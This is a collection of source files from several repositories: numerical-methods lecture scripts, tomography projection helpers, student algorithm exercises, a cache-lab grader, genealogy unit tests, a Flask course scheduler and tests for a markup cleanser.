pyplot.plot(x, y, 'kx', mew=2)
pyplot.plot(x_exact, 2*numpy.exp(1)/(numpy.exp(1)-1)*(1-numpy.exp(-x_exact))-x_exact)
pyplot.xlabel(r"$x$")
pyplot.show()
pyplot.plot(x, y-(2*numpy.exp(1)/(numpy.exp(1)-1)*(1-numpy.exp(-x))-x))
pyplot.xlabel(r"$x$")
pyplot.show()
def f_nonlinear(x, y, dy):
return -1/(1+y**2)
def dfdy_nonlinear(x, y, dy):
return 2*y/(1+y**2)**2
def dfddy_nonlinear(x, y, dy):
return numpy.zeros_like(x)
x, y = relax_blackbox(f_nonlinear, [0, 0], 50)
pyplot.plot(x, y, 'k--')
pyplot.show()
x, y = relax_newton(f_nonlinear, dfdy_nonlinear, dfddy_nonlinear,
[0, 0], 50)
pyplot.plot(x, y, 'k--')
pyplot.show()
```
#### File: tex/codes/lecture4.py
```python
import numpy
def lu(A):
n = len(A)
L = numpy.zeros_like(A)
U = numpy.zeros_like(A)
for k in range(n):
L[k, k] = 1.0
U[k, k] = (A[k, k] - numpy.dot(L[k, :], U[:, k])) / L[k, k]
for row in range(k+1, n):
L[row, k] = (A[row,k] - numpy.dot(L[row,:],U[:,k])) / U[k, k]
for col in range(k+1, n):
U[k, col] = (A[k,col] - numpy.dot(L[k,:],U[:,col])) / L[k, k]
return L, U
if __name__=="__main__":
A = numpy.array([[1.0, 2.0, 3.0],
[4.0, 5.0, 6.0],
[7.0, 8.0, 0.0]])
b = numpy.array([[1.0], [2.0], [3.0]])
L, U = lu(A)
print(A)
print(L)
print(U)
print(numpy.dot(L, U))
# Compare this against the result on the slides
A = numpy.array([[2.0, 1.0,-1.0],
[4.0, 1.0, 0.0],
[-2.0,-3.0,8.0]])
print(A)
L, U = lu(A)
print(L)
print(U)
print(numpy.dot(L, U))
```
#### File: tex/codes/lecture6.py
```python
import numpy
from matplotlib import pyplot
def bisection(f, interval, max_steps=100, tol=1e-10):
x_lo, x_hi = interval
x = (x_lo + x_hi)/2
f_lo = f(x_lo)
f_hi = f(x_hi)
fx = f(x)
steps = 0
while steps < max_steps and abs(fx) > tol and (x_hi - x_lo) > tol:
steps = steps + 1
if fx*f_hi < 0: # Root lies in right-hand half
x_lo = x
f_lo = fx
else: # Root lies in left-hand half
x_hi = x
f_hi = fx
x = (x_lo + x_hi) / 2
fx = f(x)
print("Nsteps", steps)
return x
if __name__=="__main__":
def f(x):
return numpy.exp(x) + x - 2
def g(x):
return numpy.sin(x**2) - 0.1*x
interval = [0,1]
s = bisection(f, interval)
print("s = ", s, "f(s) = ", f(s))
x = numpy.linspace(0, 10, 1000)
pyplot.plot(x, g(x))
pyplot.show()
s = bisection(g, [1,10])
print("s = ", s, "g(s) = ", g(s))
s = bisection(g, [1,9])
print("s = ", s, "g(s) = ", g(s))
s = bisection(g, [1,8.5])
print("s = ", s, "g(s) = ", g(s))
s = bisection(g, [1,8])
print("s = ", s, "g(s) = ", g(s))
```
#### File: tex/codes/lecture8.py
```python
import numpy
def functional_iteration(f, x0, max_steps=100, tol=1e-10):
x = numpy.zeros(max_steps+1)
x[0] = x0
step = 0
g = lambda x : x - f(x)
while abs(f(x[step])) > tol and step < max_steps:
step = step + 1
x[step] = g(x[step-1])
return x[:step+1]
def chord(f, x0, m, max_steps=100, tol=1e-10):
x = numpy.zeros(max_steps+1)
x[0] = x0
step = 0
g = lambda x : x - m * f(x)
while abs(f(x[step])) > tol and step < max_steps:
step = step + 1
x[step] = g(x[step-1])
return x[:step+1]
def newton(f, df, x0, max_steps=100, tol=1e-10):
x = numpy.zeros(max_steps+1)
x[0] = x0
step = 0
g = lambda x : x - f(x) / df(x)
while abs(f(x[step])) > tol and step < max_steps:
step = step + 1
x[step] = g(x[step-1])
return x[:step+1]
def secant(f, x0, x1, max_steps=100, tol=1e-10):
x = numpy.zeros(max_steps+1)
x[0] = x0
x[1] = x1
step = 1
while abs(f(x[step])) > tol and step < max_steps:
step = step + 1
x[step] = x[step-1] - f(x[step-1]) * (x[step-1] - x[step-2]) / \
(f(x[step-1]) - f(x[step-2]))
return x[:step+1]
if __name__=="__main__":
def f(x):
return x - numpy.cos(x)
def df(x):
return 1 + numpy.sin(x)
x_func_iteration = functional_iteration(f, 0)
print("Functional iteration")
print("s={}, f(s)={}, in {} steps".format(x_func_iteration[-1],
f(x_func_iteration[-1]), len(x_func_iteration)))
x_chord = chord(f, 0, 1.08)
print("Chord, m=1.08")
print("s={}, f(s)={}, in {} steps".format(x_chord[-1],
f(x_chord[-1]), len(x_chord)))
x_chord = chord(f, 0, 0.8)
print("Chord, m=0.8")
print("s={}, f(s)={}, in {} steps".format(x_chord[-1],
f(x_chord[-1]), len(x_chord)))
x_newton = newton(f, df, 0)
print("Newton")
print("s={}, f(s)={}, in {} steps".format(x_newton[-1],
f(x_newton[-1]), len(x_newton)))
x_secant = secant(f, 0, 1)
print("Secant")
print("s={}, f(s)={}, in {} steps".format(x_secant[-1],
f(x_secant[-1]), len(x_secant)))
```
#### File: NumericalMethods/Worksheets/Worksheet1_Answers.py
```python
def MatrixConditionCheck(A):
import numpy as np
MaxConditionNumber = 10 # This is absurdly low
ConditionNumber = np.linalg.cond(A)
if ConditionNumber > MaxConditionNumber:
print "Condition number of matrix\n", A, "\ntoo large (bigger than", MaxConditionNumber, ").\n"
import numpy as np
print "\nQuestion 1\n"
A1 = np.array([[1,2],[3,4]])
A1T = np.transpose(A1)
A1I = np.linalg.inv(A1)
print "The matrix\n", A1, "\nhas transpose\n", A1T, "\nand inverse\n", A1I
A2 = np.array([[-3,2],[3,6]])
A2T = np.transpose(A2)
A2I = np.linalg.inv(A2)
print "The matrix\n", A2, "\nhas transpose\n", A2T, "\nand inverse\n", A2I
print "\nQuestion 2\n"
v1 = np.array([1,3,-1])
v2 = np.array([1,-2])
v3 = np.array([1,6,-3,1])
print "The vector\n", v1, "\nhas norms", np.linalg.norm(v1,1), np.linalg.norm(v1,2), np.linalg.norm(v1,np.inf)
print "The vector\n", v2, "\nhas norms", np.linalg.norm(v2,1), np.linalg.norm(v2,2), np.linalg.norm(v2,np.inf)
print "The vector\n", v3, "\nhas norms", np.linalg.norm(v3,1), np.linalg.norm(v3,2), np.linalg.norm(v3,np.inf)
print "The matrix\n", A1, "\nhas norms", np.linalg.norm(A1,1), np.linalg.norm(A1,np.inf)
print "The matrix\n", A2, "\nhas norms", np.linalg.norm(A2,1), np.linalg.norm(A2,np.inf)
print "\nQuestion 3\n"
MatrixConditionCheck(A1)
MatrixConditionCheck(A2)
print "\nQuestion 4\n"
# Bisection algorithm
tolerance = 1e-15
# Define the function
f = lambda x: np.tan(x) - np.exp(-x)
# Define the interval
x_min = 0.0
x_max = 1.0
# Values at the ends of the domain
f_min = f(x_min)
f_max = f(x_max)
assert(f_min * f_max < 0.0)
# The loop
x_c = (x_min + x_max) / 2.0
f_c = f(x_c)
iteration = 0
while ((x_max - x_min > tolerance) and (np.abs(f_c) > tolerance) and (iteration < 100)):
iteration = iteration+1
if f_min * f_c < 0.0:
x_max = x_c
f_max = f_c
else:
x_min = x_c
f_min = f_c
x_c = (x_min + x_max) / 2.0
f_c = f(x_c)
# print "Iteration ", iteration, " x ", x_c, " f ", f_c
print "The root is approximately ", x_c, " where f is ", f_c
``` |
{
"source": "josh-gree/poly2poly",
"score": 2
} |
#### File: src/data/projections.py
```python
from numpy import pi, exp ,log, vstack, newaxis, array
import odl
def prj_factory(Nx,Ny,Np,Nd,ret_A=False):
'''
returns cuda fwd and bwd projectors for given 2d geometry.
Inputs
Nx,Ny -> voxels in x and y dims
Np -> number of angles
Nd -> number of det elements
Outputs
fwd -> forward projector, calculates Ax
Input Nx*Ny matrix
Output Np*Nd matrix
bwd -> backward projector, calculates A^Tx
Input Nx*Ny matrix
Output Np*Nd matrix
'''
reco_space = odl.uniform_discr([0, 0],[1, 1], [Nx, Ny],dtype='float32')
angle_partition = odl.uniform_partition(0, 2 * pi, Np)
detector_partition = odl.uniform_partition(-0.1, 1.1, Nd)
geometry = odl.tomo.Parallel2dGeometry(angle_partition, detector_partition)
ray_trafo = odl.tomo.RayTransform(reco_space, geometry, impl='astra_cuda')
fwd = lambda X : ray_trafo(X).asarray()
bwd = lambda X : ray_trafo.adjoint(X).asarray()
return fwd, bwd
def multi_mono_prj(fwd_bwd,X):
'''
monoprojection for each energy, calculates AX or A^TX
Inputs
fwd_bwd -> fwd or bwd projection operator should be viable for shape of x
This will come from prj_factory
x -> poly energy image (Ne x Nx x Ny)
Outputs
out -> basicly this is AX or A^TX
'''
if len(X.shape) == 2:
out = fwd_bwd(X)
return out
Ne = X.shape[0]
out = vstack([fwd_bwd(X[i,...])[newaxis,...] for i in range(Ne)])
return out
def poly_projection(fwd,X,I):
'''
calculates -log(ZI), where Z = exp(-AX)
'''
if not I.shape:
I = array([I])
Z = exp(-multi_mono_prj(fwd,X))/I.sum()
out = -log((Z*I[:,newaxis,newaxis]).sum(axis=0))
return out
``` |
{
"source": "joshgrib/2017S-coursework",
"score": 4
} |
#### File: cs370a/20170306/subStr.py
```python
def LCS(s1, s2):
if len(s1) is 0 or len(s2) is 0:
return 0
if s1[0] == s2[0]:
return 1 + LCS(s1[1:], s2[1:])
return max(LCS(s1, s2[1:]), LCS(s1[1:], s2))
#print LCS("hello", "world")
#print LCS("", "world")
#print LCS("hello", "")
#print LCS("abdez", "bed")
def fast_LCS(s1, s2):
def fast_LCS_helper(s1, s2, memo):
if (s1, s2) in memo:
return memo[(s1, s2)]
if len(s1) is 0 or len(s2) is 0:
result = 0
elif s1[0] == s2[0]:
result = 1 + fast_LCS_helper(s1[1:], s2[1:], memo)
else:
result = max(fast_LCS_helper(s1, s2[1:], memo), fast_LCS_helper(s1[1:], s2, memo))
memo[(s1, s2)] = result
return result
return fast_LCS_helper(s1, s2, {})
#print fast_LCS("hello", "world")
#print fast_LCS("", "world")
#print fast_LCS("hello", "")
#print fast_LCS("abdez", "bed")
#print fast_LCS("abdezafsdnklafsdf", "bedsadfsfapfda")
def LCS_with_values(s1, s2):
if len(s1) is 0 or len(s2) is 0:
return (0, '')
if s1[0] == s2[0]:
result = LCS_with_values(s1[1:], s2[1:])
return (1+result[0], s1[0]+result[1])
use_s1 = LCS_with_values(s1[1:], s2)
use_s2 = LCS_with_values(s1, s2[1:])
if use_s1[0]>use_s2[0]:
return use_s1
return use_s2
#print LCS_with_values("hello", "world")
#print LCS_with_values("", "world")
#print LCS_with_values("hello", "")
#print LCS_with_values("abdez", "bed")
"""CHALLENGE
Instead of longest COMMON subsequence,
get the longest INCREASING subsequence
Strinctly increasing - no duplicates
"""
def LIS_LCS_helper(s1, s1sorted):
if len(s1) is 0:
return 0
if s1[0] == s2[0]:
return 1 + LCS(s1[1:], s2[1:])
return LCS(s1[1:], s2[1:])
def LIS(s1):
return LCS(s1, sorted(s1))
#count = int(input())
#inp = [0] * count
#for i in range(count):
# inp[i] = int(input())
#print LIS2(inp)
print LIS("abcdfyzaldhs")
print LIS([15, 27, 14, 38, 26, 55, 46, 65, 85])
print LIS([2, 7, 4, 3, 8])
arr = [1, 2, 6, 3, 14, 7, 10, 9, 0, 12]
def LIS2(arr):
dp = [1] * len(arr)
index = 1
while (index < len(arr)):
subindex = index - 1
while (subindex >= 0):
if arr[index] > arr[subindex]:
dp[index] = max(dp[index], 1 + dp[subindex])
subindex -= 1
index += 1
return dp[len(arr) - 1]
print LIS2("abcdfyzaldhs")
print LIS2([15, 27, 14, 38, 26, 55, 46, 65, 85])
print LIS2([2, 7, 4, 3, 8])
```
#### File: cs370a/20170320/increasing_subsequence.py
```python
exInLen = 5
exIn = [2, 7, 4, 3, 8]
exOut = 3
def LIS(arr):
'''
An O(n^2) solution
'''
n = len(arr)
lis = [1]*n
for i in range (1 , n):
for j in range(0 , i):
if arr[i] > arr[j] and lis[i]< lis[j] + 1 :
lis[i] = lis[j]+1
maxLen = 0
for i in range(n):
maxLen = max(maxLen , lis[i])
return maxLen
'''
THE ALGORITHM for O(nlogn)
1. If A[i] is smallest among all end
candidates of active lists, we will start
new active list of length 1.
2. If A[i] is largest among all end candidates of
active lists, we will clone the largest active
list, and extend it by A[i].
3. If A[i] is in between, we will find a list with
largest end element that is smaller than A[i].
Clone and extend this list by A[i]. We will discard all
other lists of same length as that of this modified list.
'''
exIn = [2, 7, 4, 3, 8]
def LIS_fast(arr):
listTracker = [[arr[0]]]
for i in range(1, len(arr)):
smallest = True
largest = True
largestList = listTracker[0]
for subLst in listTracker:
if subLst[-1] < arr[i]:
smallest = False
if subLst[-1] > arr[i]:
largest = False
if len(subLst) > len(largestList):
largestList = subLst
if smallest:
listTracker.append([arr[i]])
elif largest:
newLst = largestList.append(arr[i])
else:
maxEndElemLst = listTracker[0]
for subLst in listTracker:
if subLst[-1] < arr[i]:
if len(subLst) > len(maxEndElemLst):
maxEndElemLst = subLst
newLst = maxEndElemLst.append(arr[i])
listTracker = listTracker.filter((lambda x: len(x) != len(newLst)), listTracker)
listTracker.append(newLst)
maxLenLst = listTracker[0]
for lst in listTracker:
if len(lst) > len(maxLenLst):
maxLenLst = lst
return len(maxLenLst)
print LIS_fast(exIn)
inputLength = input()
inArr = []
for i in range(0, inputLength):
thisNum = input()
inArr.append(thisNum)
print LIS(inArr)
```
#### File: assignments/03-cachelab/driver.py
```python
import subprocess;
import re;
import os;
import sys;
import optparse;
#
# computeMissScore - compute the score depending on the number of
# cache misses
#
def computeMissScore(miss, lower, upper, full_score):
if miss <= lower:
return full_score
if miss >= upper:
return 0
score = (miss - lower) * 1.0
range = (upper- lower) * 1.0
return round((1 - score / range) * full_score, 1)
#
# main - Main function
#
def main():
# Configure maxscores here
maxscore= {};
maxscore['csim'] = 27
# Parse the command line arguments
p = optparse.OptionParser()
p.add_option("-A", action="store_true", dest="autograde",
help="emit autoresult string for Autolab");
opts, args = p.parse_args()
autograde = opts.autograde
# Check the correctness of the cache simulator
print "Part A: Testing cache simulator"
print "Running ./test-csim"
p = subprocess.Popen("./test-csim",
shell=True, stdout=subprocess.PIPE)
stdout_data = p.communicate()[0]
# Emit the output from test-csim
stdout_data = re.split('\n', stdout_data)
for line in stdout_data:
if re.match("TEST_CSIM_RESULTS", line):
resultsim = re.findall(r'(\d+)', line)
else:
print "%s" % (line)
# Compute the scores for each step
csim_cscore = map(int, resultsim[0:1])
total_score = csim_cscore[0]
print "%22s%8.1f%10d" % ("Total points", total_score, maxscore['csim'])
# Emit autoresult string for Autolab if called with -A option
if autograde:
autoresult="%.1f" % (total_score)
print "\nAUTORESULT_STRING=%s" % autoresult
# execute main only if called as a script
if __name__ == "__main__":
main()
```
#### File: assignments/hw04/tests.py
```python
import unittest
from main import *
class UserStory04Tests(unittest.TestCase):
def test1(self):
#no marriage or divorce is fine
self.assertTrue(marriage_before_divorce({},{}))
def test2(self):
#marriage without divorce is fine
m = {"year":2000, "month":01, "day":01}
self.assertTrue(marriage_before_divorce(m,{}))
def test3(self):
#divorce without marriage is NOT fine
d = {"year":2000, "month":01, "day":01}
self.assertFalse(marriage_before_divorce({},d))
def test4(self):
#both events, with marriage first is fine
m = {"year":2000, "month":01, "day":01}
d = {"year":2010, "month":01, "day":01}
self.assertTrue(marriage_before_divorce(m,d))
def test5(self):
#both events, with divorce first is NOT fine
d = {"year":2000, "month":01, "day":01}
m = {"year":2010, "month":01, "day":01}
self.assertFalse(marriage_before_divorce(m,d))
class UserStory05Tests(unittest.TestCase):
def test1(self):
#no marriage or death is fine
self.assertTrue(marriage_before_death({},{}))
def test2(self):
#marriage without death is fine
m = {"year":2000, "month":01, "day":01}
self.assertTrue(marriage_before_death(m,{}))
def test3(self):
#death without marriage is fine
d = {"year":2000, "month":01, "day":01}
self.assertTrue(marriage_before_death({},d))
def test4(self):
#both events, with marriage first is fine
m = {"year":2000, "month":01, "day":01}
d = {"year":2010, "month":01, "day":01}
self.assertTrue(marriage_before_death(m,d))
def test5(self):
#both events, with death first is NOT fine
d = {"year":2000, "month":01, "day":01}
m = {"year":2010, "month":01, "day":01}
self.assertFalse(marriage_before_death(m,d))
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joshgrib/sitstuff",
"score": 3
} |
#### File: src/models/scheduler.py
```python
import urllib
import os
import xml.etree.ElementTree as etree
import re
import itertools
def get_sem_list():
import requests
import re
url = 'http://web.stevens.edu/scheduler/core/'
order = {'W':0, 'S':1, 'A':2, 'B':3, 'F':4}#custom alphabetic order
r = requests.get(url)
myre = re.compile(r'[0-9]{4}[A-Z]')#get things like '####A'
re_list = myre.findall(r.text)
sem_list = sorted(
list(set(re_list)), #gets only unique values
#sort by year then term in custom alphabetic order
key=lambda semester: (semester[:4], order.get(semester[-1])),
reverse=True)#most recent first
return sem_list
SEMESTER = get_sem_list()[0]
def cleanupCourses(this_root, this_course_list): # called from schedule()
"""Given the root of the xml tree and the course list, this will go through the XML and remove any course not in the list from the tree, then returns the revised root"""
for course in this_root.findall('Course'):
name = course.get('Section')
while re.match("([A-Za-z-])", name[-1]) or re.match("([A-Za-z-])", name[-2]):
name = name[:(len(name) - 1)]
if name not in this_course_list:
this_root.remove(course)
return this_root
def cleanupElements(this_root): # called from schedule()
"""Given the root of the xml tree, this goes through the courses and removes any elements that don't have info about meeting times, then returns the revised root"""
for course in this_root.findall('Course'):
for element in course:
if element.tag == 'Meeting':
pass
else:
course.remove(element)
return this_root
def fixSpacing(this_root): # called from schedule()
"""Given the root of the xml tree, this will go through and fix the spacing between the letters and numbers so it can be compared better later on, then returns the revised root"""
for course in this_root:
attribs = course.attrib
section = attribs['Section']
index_count = 0
new_section = ""
for letter in section:
if letter == " ":
letter = (4 - index_count) * " "
new_section = new_section + letter
index_count += 1
attribs['Section'] = new_section
return this_root
def fixTime(time): # called from schedule()
"""Given a time from the "StartTime" or "EndTime" attribute in the xml tree, this will change teh format to HHMM and return the revised time. This also corrects a 4 hour offset present in the time formats"""
time = time[:(len(time) - 4)]
if len(time) == 4: # add a 0 to the front of early times
time = '0' + time
time = time[:2] + time[3:] # remove the colon
hours = int(time[:2]) + 4 # correct 4 hour offset
hours = str(hours)
if len(hours) == 1:
# add the 0 in fron of early times if it needs it now
hours = "0" + hours
time = hours + time[2:]
return time
def fixTimeFormat(this_root): # called from schedule()
"""Given the root of the xml tree, this will go through and fix the time formatting, making it standard 24hr as 4 digits in the form of HHMM, then returns the revised root"""
for course in this_root:
for meeting in course:
attribs = meeting.attrib
try:
start_time = attribs['StartTime'] # get values
end_time = attribs['EndTime']
start_time = fixTime(start_time) # fix values
end_time = fixTime(end_time)
attribs['StartTime'] = start_time # reassign
attribs['EndTime'] = end_time
except KeyError:
# somehow something that wasn't a meeting slipped through
course.remove(meeting)
return this_root
def getCallNums(this_root): # called from schedule()
"""Given the root of the xml tree, this will parse the xml and return a dictionary of course sections and call numbers"""
call_numbers = {}
for course in this_root:
section_name = course.attrib['Section']
call_num = int(course.attrib['CallNumber'])
call_numbers[section_name] = call_num
return call_numbers
def getBigDict(this_root): # called from schedule()
"""Given the root of the xml tree, this will parse the xml and return a nested dictionary of courses, sections, and meeting times"""
big_dict = {}
prev_course = ""
for course in this_root: # add classes and section lists
attribs = course.attrib
this_course = attribs['Section']
if len(this_course) == 9: # recitation course
course_big = this_course[:8]
course_section = this_course[8:]
if course_big == prev_course[:8]: # same course
# add the new section with a list
big_dict[course_big][course_section] = []
else: # new course
big_dict[course_big] = {} # add the new class
# add the new section with a list
big_dict[course_big][course_section] = []
else: # normal course(lecture)
course_big = this_course[:7]
course_section = this_course[7:]
if this_course[:7] == prev_course[:7]: # same course
# add the new section with a list
big_dict[course_big][course_section] = []
else: # new course
big_dict[course_big] = {} # add the new class
# add the new section with a list
big_dict[course_big][course_section] = []
prev_course = this_course
for meeting in course: # write the meetings to the section lists
info = meeting.attrib
try:
day = info['Day']
startTime = info['StartTime']
endTime = info['EndTime']
# if the exact same meeting is already in the list
if [day, startTime, endTime] in big_dict[course_big][course_section]:
break # then dont add another!
if len(day) == 1: # if this meeting describes one day
big_dict[course_big][course_section].append(
[day, startTime, endTime]) # add the meeting time
else: # if multiple days happen at the same time
for letter in day: # add one list for each meeting
big_dict[course_big][course_section].append(
[letter, startTime, endTime])
except KeyError:
pass
#TOGGLE below for list of courses that cause errors
#global global_class_error_list
#global_class_error_list.append(str(course.get('Section')))
return big_dict
def isAllowed(classList1, classList2): # called from checkCombination()
'''Given two meeting lists, check to see if there is a conflict, and return True if there is not'''
# if class 2 ends before class 1 starts, or class 1 ends before class 2
# starts, then it's fine
if (classList2[2] < classList1[1]) or (classList1[2] < classList2[1]):
return True
else:
return False
def checkCombination(courseDict, inputList): # called from findAllCombos()
'''This will go through a combination list and see if it all works. If it does it will return a true value'''
conflicts = 0 # initialize counters
# find all combinations of size 2 from the inputList
for thisCombo in itertools.combinations(inputList, 2):
# comparison one in the item in the list we are on now
comp1 = thisCombo[0]
# seperate the section and the course, different if its a lecture
if len(comp1) == 9:
course1 = comp1[0:8]
section1 = comp1[8:]
else:
course1 = comp1[0:7]
section1 = comp1[7:]
comp2 = thisCombo[1] # comparison two is the next item in the list
# seperate the section and the course, different if its a letter
if len(comp2) == 9:
course2 = comp2[0:8]
section2 = comp2[8:]
else:
course2 = comp2[0:7]
section2 = comp2[7:]
# check one is the list of meetings for course1 section1
check1 = courseDict[course1][section1]
# check two is the list of meetings for course2 section2
check2 = courseDict[course2][section2]
for meeting1 in check1:
for meeting2 in check2:
# if the meetings are on the same day...
if meeting1[0] == meeting2[0]:
# if there is no conflicts do nothing
if (isAllowed(meeting1, meeting2) == True):
pass
# if there is a conflict, add to the conflict counter
else:
conflicts = conflicts + 1
if conflicts == 0: # if there were no conflicts, return true
return True
#return False #maybe this should be here?
def findAllCombos(courseDict, callNumbers): # called from schedule()
'''This function goes through the nested courses, stores lists of all possible combinations of courses, and prints them'''
bigList = [] # list of lists of courses and sections
goodCombos = [] # store all the good combinations
badCombos = [] # store the bad combinations
possibilities = ""
# make a list of lists with the small lists being lists of possible
# sections for one course
for course in courseDict:
courseList = []
for section in courseDict[course]:
courseList.append(str(course + section))
bigList.append(courseList)
combos = 0 # initialize the counter
# find all combinations of one section of each class
allCombos = list(itertools.product(*bigList))
for combo in allCombos:
combos = combos + 1
# see if the combo works and add to apppropriate list
checkCombination(courseDict, combo)
if checkCombination(courseDict, combo) == True:
goodCombos.append(combo)
else:
badCombos.append(combo)
possibilities = {}
# possibilities['totalCombos']=str(combos)
# possibilities['goodCombos']=str(goodCombos)
comboCounter = 1
for x in goodCombos:
urlPart = []
possibilities[comboCounter] = {}
for course in x:
urlPart.append(callNumbers[str(course)])
# format url
url = 'https://web.stevens.edu/scheduler/#' + SEMESTER + '='
for callNumber in urlPart:
url = url + str(callNumber) + ","
url = url[:-1]
possibilities[comboCounter]['url'] = str(url)
possibilities[comboCounter]['list'] = str(x)
comboCounter = comboCounter + 1
return possibilities
def schedule(course_list):
"""
Given a list of courses, return a dictionary of the possible schedules
['BT 353','CS 135','HHS 468','BT 181','CS 146','CS 284'] -->
{1:
{'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12011,11995,10482,10487',
'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353C', 'HHS 468EV', 'CS 146B', 'CS 284RA')"},
2: {'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12011,11995,10482,12166',
'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353C', 'HHS 468EV', 'CS 146B', 'CS 284RB')"},
3: {'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12012,11995,10482,10487',
'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353D', 'HHS 468EV', 'CS 146B', 'CS 284RA')"},
4: {'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12012,11995,10482,12166',
'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353D', 'HHS 468EV', 'CS 146B', 'CS 284RB')"}}
"""
print course_list
url = 'https://web.stevens.edu/scheduler/core/' + SEMESTER + '/' + SEMESTER + '.xml'
urllib.urlretrieve(url, 'courses.xml')
tree = etree.parse('courses.xml')
os.remove('courses.xml')
root = tree.getroot()
root = cleanupCourses(root, course_list)
root = cleanupElements(root)
root = fixSpacing(root)
root = fixTimeFormat(root)
call_numbers = getCallNums(root)
big_dict = getBigDict(root)
all_combos = findAllCombos(big_dict, call_numbers)
return all_combos
if __name__ == '__main__':
print schedule(['CS 442', 'CS 392', 'CS 519', 'MA 331'])
```
#### File: sitstuff/src/views.py
```python
from flask import Flask, render_template, request, make_response, redirect, session, jsonify
from src import app
#######################
# Static pages #
# and errors #
#######################
@app.route('/')
@app.route('/index')
def index():
"""
Returns the home page
"""
resp = make_response(render_template("index.html", title='Home'))
return resp
@app.route('/donate')
def donate():
return render_template("donate.html", title='Donate')
@app.errorhandler(500)
def internal_error(error):
return render_template('505.html'), 505
@app.errorhandler(404)
def not_found(error):
return render_template('404.html'), 404
@app.errorhandler(403)
def forbidden_error(error):
return render_template('403.html'), 403
#######################
# Course info #
#######################
from models import dbtools
@app.route('/courses')
def courses():
db = dbtools.CourseDB('src/models/course_info.db', 'courses')
courses = db.get_HTML()
depts = db.get_depts()
db.close_db()
resp = render_template('courses.html',
title='Courses',
courses=courses,
letter_links=depts)
return resp
#######################
# Scheduling #
#######################
from models import scheduler
import json
PER_PAGE = 10
AMOUNT_OF_COURSES = 10
@app.route('/sched_entry')
def how_many_post():
"""
Goes to form with AMOUNT_OF_COURSES text boxes to input
courses to schedule, form action=/schedules, method=POST
"""
default_courses = ['CS 442', 'CS 392', 'CS 519', 'MA 331']
resp = make_response(render_template(
"sched_entry.html",
quantity=AMOUNT_OF_COURSES,
title='Scheduler',
default_vals=default_courses))
resp.set_cookie('course_combos', '', expires=0)
return resp
@app.route('/schedules', methods=['GET','POST'])
def my_form_post():
"""
Gets input from form, puts it in a list, gets the schedules,
send JSON of course combinations and send then to /sched as
a cookie
"""
text_list = []
#make list of form inputs
for i in range(1, AMOUNT_OF_COURSES + 1):
form_num = 'text' + str(i)
text_list.append(request.form[form_num])
#remove items with no input, generate string of courses
final_list = []
for text in text_list:
if not text == "":
final_list.append(text)
courses_str = ""
for course in final_list[:-1]:
courses_str += (str(course) + ',')
courses_str += str(final_list[-1])
courses_str = courses_str.upper()
#turn string of courses entered into list
c_list = courses_str.split(',')
#get the schedules
#print "\nCourse list:"
#print str(c_list) + "\n"
my_combos = scheduler.schedule(c_list)
resp = make_response(redirect('/sched'))
resp.set_cookie('course_combos', '', expires=0)
resp.set_cookie('course_combos', json.dumps(my_combos))
return resp
@app.route('/get_combos', methods=['GET'])
def getCombosAPI():
"""
Upon a GET request containing csv course names in a query string...
Find the combos and send them as JSON
"""
all_args = request.args.lists()
course_list = all_args[0][1][0].split(",")
u_COURSE_LIST = map((lambda x: x.upper()), course_list)#make all caps just in case
COURSE_LIST = map( str, u_COURSE_LIST)#unicode list -> list of python strs
combos = scheduler.schedule(COURSE_LIST)
return jsonify(combos)
def getCombosForPage(page_num, per_page, count_of_combos, combos):
"""Returns the set of combos for the current page"""
combos_start = (per_page * (page_num - 1)) + 1
combos_end = combos_start + per_page
these_combos = {}
for key in range(combos_start, combos_end):
try:
# if new dict is not an int schedules are not sorted on the page
these_combos[key] = combos[str(key)]
except KeyError:
pass
return these_combos
def isLastPage(page_num, count_of_combos, per_page):
"""Return True if this is the last page in the pagination"""
if count_of_combos <= (page_num * per_page):
return True
return False
@app.route('/sched/', defaults={'page': 1})
@app.route('/sched/page/<int:page>')
def scheduleMe(page):
"""
Display schedules as links and iframes
"""
querystring_combos = request.cookies.get('course_combos')
if not querystring_combos:
return render_template('404.html'), 404
combos = json.loads(querystring_combos)
#print querystring_combos
count = len(combos)
pagination_needed = count > PER_PAGE
this_page_combos = combos
if pagination_needed:
this_page_combos = getCombosForPage(page, PER_PAGE, count, combos)
last_page = isLastPage(page, count, PER_PAGE)
if not this_page_combos and page != 1:
return render_template('404.html'), 404
return render_template("sched.html",
title="Scheduler",
combos=this_page_combos,
combo_amount=str(count),
page=page,
last_page=last_page,
pagination=pagination_needed)
########################
# Random stuff #
########################
``` |
{
"source": "joshgroeneveld/gis.utah.gov",
"score": 3
} |
#### File: gis.utah.gov/scripts/tests.py
```python
import unittest
from os.path import dirname, join
import cleanser
import UpdateYaml
import yaml
#: run with python -m unittest discover scripts
class TestCleanser(unittest.TestCase):
def test_update_image_url(self):
test = '<p>[image title="Students watch a portion of "The Geospatial Revolution" to learn about GIS." size="medium" align="left" icon="zoom" lightbox="true" quality="100"]/gallery/agrc-general/gis_day_slcc_2011.jpg[/image]For'
valid = '<p><img src="{{ "/images/gallery/agrc-general/gis_day_slcc_2011.jpg" | prepend: site.baseurl }}" class="inline-text-left" />For'
self.assertEqual(cleanser.update_image_tag(test), valid)
def test_update_gallery_links(self):
# self.fail('write a test')
pass
def test_update_css_links(self):
# self.fail('write a test')
pass
def test_update_page_links(self):
# self.fail('write a test')
pass
def test_update_download_asset_links(self):
# self.fail('write a test')
pass
def test_update_data_page_buttons(self):
test = '<a href="ftp://ftp.agrc.utah.gov" class="button medium white"><span class="button-text">Download Locators</span></a>'
valid = '<a href="ftp://ftp.agrc.utah.gov" class="button medium white"><span class="button-text">Download Locators</span></a>'
self.assertEqual(cleanser.update_data_download_button(test), valid)
def test_captions(self):
test = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/><figcaption class="caption__text">Concept of an Address Locator</figcaption></div>'
